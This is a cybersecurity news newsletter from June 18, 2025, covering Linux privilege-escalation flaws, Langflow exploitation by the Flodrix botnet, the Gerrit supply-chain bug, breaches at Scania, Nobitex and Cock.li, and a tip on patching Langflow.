Cyber Briefing: 2025.06.18

Linux and Langflow flaws allow critical exploits, Google patches Gerrit. Breaches hit Scania, Nobitex, and Cock.li. CIA leaker sentenced, 23andMe fined $3M, Coralogix secures $115M for AI.

Jun 18, 2025

👉 What's trending in cybersecurity today?

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please Subscribe

Get Help

🚨 Cyber Alerts

1. New Linux Flaws Allow Easy Root Access

Security researchers at Qualys have discovered two new interconnected vulnerabilities that allow a local attacker to chain exploits together and gain full root privileges on major Linux distributions. The attack begins by exploiting a PAM configuration flaw in SUSE systems (CVE-2025-6018) to elevate an attacker's status, which then enables the exploitation of a second, more widespread bug. This second flaw (CVE-2025-6019) exists in the ubiquitous libblockdev library and udisks daemon, which ships by default on nearly all Linux systems including Ubuntu, Debian, and Fedora. Given the exploit's simplicity and the widespread presence of the vulnerable components, organizations are urged to treat this as a critical risk and apply patches for both PAM and libblockdev without delay.

2. Langflow Flaw Delivers Flodrix DDoS Botnet

A new campaign is actively exploiting a critical vulnerability (CVE-2025-3248) in the AI application framework Langflow to deliver the Flodrix botnet malware to unpatched servers. Trend Micro researchers report that attackers are using a public proof-of-concept exploit to run downloader scripts on compromised Langflow instances, which then fetch and install the botnet. Once installed, the Flodrix botnet, an evolution of the LeetHozer family, communicates with command-and-control servers to launch encrypted DDoS attacks against various targets. This campaign follows a CISA warning about the active exploitation of this same Langflow flaw, highlighting the ongoing risk of unpatched software in development environments.

3. Google Fixes GerriScary Supply Chain Flaw

A critical supply chain vulnerability dubbed “GerriScary” was discovered in Google’s Gerrit code collaboration platform, which could have allowed attackers to inject malicious code into at least 18 major projects like ChromiumOS and Dart. The technique, found by a Tenable researcher, exploited a combination of default permissions, flawed "Copy Conditions" settings, and a race condition with automated bots to get unapproved code merged into trusted repositories. This vulnerability created a significant risk to the software supply chain, as it impacted foundational Google projects including its build system Bazel, the Dart programming language, and even the Gerrit platform itself. In response to the disclosure, Google swiftly patched its projects by reconfiguring permissions and approval settings, but researchers warn other organizations using Gerrit may still be vulnerable to similar misconfigurations.

For more alerts, click here!

Check Jobs

💥 Cyber Incidents

4. Scania Insurance Data Stolen In Partner Hack

Swedish heavy vehicle manufacturer Scania has confirmed a cyberattack on its insurance and financial services division after a threat actor named "hensi" claimed to be selling stolen data online. According to Scania, the breach occurred on May 28-29 when an attacker used credentials stolen from an external IT partner via password stealer malware to access its insurance systems. The attacker downloaded sensitive documents related to insurance claims and then attempted to extort Scania employees by threatening to disclose the data before leaking samples. In response, Scania has taken the affected application offline, notified privacy authorities, and launched an investigation with external experts, stating the operational impact was limited.

5. Pro Israel Group Claims $81M Nobitex Hack

The Iranian cryptocurrency exchange Nobitex was hacked for over $81 million, with onchain investigators spotting suspicious outflows from its hot wallets to attacker-controlled "vanity addresses" containing political messages. A pro-Israel hacker group named “Gonjeshke Darande” claimed responsibility for the attack, accusing the exchange of being a tool for the Iranian regime to finance terror and evade international sanctions. Nobitex confirmed a breach affecting some of its hot wallets but assured users their assets are secure in cold storage and that all losses will be fully compensated. This cyberattack occurs amid a renewed military conflict between Israel and Iran, highlighting the potential for state-linked or patriotic hacking groups to use cyberattacks as a new front in geopolitical disputes.

6. Hacker Sells Data Of 1M Cock.li Users

The privacy-focused email hosting provider Cock.li has confirmed a data breach affecting over one million user records after a threat actor exploited its Roundcube webmail platform. The incident, which exposed email addresses and login timestamps but not passwords or email content, came to light after the attacker began selling the stolen databases online for one Bitcoin. Cock.li believes the data was stolen via an old SQL injection vulnerability in Roundcube and has since permanently removed the webmail software from its service. The company, which is popular in infosec communities but also with cybercriminals, has recommended all users who have logged in since 2016 to reset their passwords as a precaution.

For more incidents, click here!

Click to Read

📢 Cyber News

7. Ex CIA Analyst Guilty Of Leaking US Secrets

Former U.S. Central Intelligence Agency analyst Asif William Rahman has been sentenced to 37 months in prison for unlawfully retaining and transmitting top secret National Defense Information. Arrested last November in Cambodia, Rahman pleaded guilty in January to taking classified documents, photographing them, and willfully sending them to several individuals without the necessary clearance. Some of the leaked documents, which reportedly related to Israel's plans to attack Iran, later began circulating online after being posted to a Telegram channel. To hide his actions, Rahman engaged in what the Justice Department called a "deletion campaign," wiping data from his computer and editing personal journal entries to conceal his opinions.

8. UK Fines 23andMe $3M For Major Data Breach

The UK’s Information Commissioner’s Office (ICO) has fined embattled genetic testing company 23andMe over $3 million for failing to protect customer data during a 2023 credential stuffing attack. The breach compromised sensitive information of seven million people worldwide, including 155,592 UK residents, after attackers used stolen credentials to access initial accounts and then scrape data from others via the "DNA Relatives" feature. Regulators found 23andMe broke data protection law by failing to require multi-factor authentication, not properly securing genetic data downloads, and missing several opportunities to detect the long-running attack. This fine was announced as a non-profit led by 23andMe's former CEO is set to acquire the now-bankrupt company, with regulators stating they will ensure privacy obligations continue under new ownership.

9. Coralogix Gets $115M To Boost Its AI Agent

Israeli data observability and security startup Coralogix has raised $115 million in a Series E funding round, reaching a pre-money valuation of over $1 billion. The company plans to use the funds to expand its engineering base in India and further develop its agentic AI companion, Olly, which helps companies understand complex system data. Led by NewView Capital, the investment will fuel Coralogix's go-to-market scaling in North America and EMEA as it competes with rivals like Datadog. The CEO stated the company aims to grow its annual recurring revenue to eight-digits and pursue a U.S. IPO on the Nasdaq within three years.

For more news, click here!

Check Events

📈Cyber Stocks

As U.S. markets open on Wednesday, June 18, 2025, these pure‑play cybersecurity names are showing mostly positive momentum amid bullish analyst sentiment, strong earnings trends, and strategic growth signals:

Okta (OKTA): Trading at $98.67, down 0.64%. The stock is consolidating following a post‑earnings dip, but remains supported by solid Q1 financials and positive analyst outlooks.
Zscaler (ZS):Trading at $307.31, up 0.77%. Shares are rallying following analyst upgrades from Wells Fargo and Barclays, with targets rising to $385 and $348, respectively.
Fortinet (FTNT): Trading at $102.88, up 0.92%. Investor confidence remains as its firewall and network security offerings continue to deliver reliable revenue and margin performance.
CrowdStrike (CRWD): Trading at $492.03, up 2.62%. The stock surges to new highs after upbeat Q1 earnings, while analysts maintain bullish long-term expectations.
Palo Alto Networks (PANW): Trading at $202.05, up 1.97%. The stock is gaining as strong next-gen and AI-driven security rollout gains traction across enterprise customers.

💡 Cyber Tip

If you're running Langflow, update it now!

Hackers are actively exploiting a critical flaw in Langflow (CVE-2025-3248) to install Flodrix, a powerful botnet that launches encrypted DDoS attacks. The flaw allows attackers to run code on exposed servers without any login, putting development environments at serious risk.

✅ What you should do:

Immediately update Langflow to the latest patched version to close the security hole.
Take any public-facing Langflow instances offline until patches are applied.
Check logs for unusual HTTP requests or shell script activity on your servers.
Monitor outbound traffic for links to known malicious IPs or the TOR network.
Apply firewalls and access controls to restrict who can reach your development tools.

🔒 Why this matters:

A single unpatched Langflow server can be used to install malware that floods other systems with traffic. This not only helps criminals but can also get your infrastructure blacklisted or taken offline.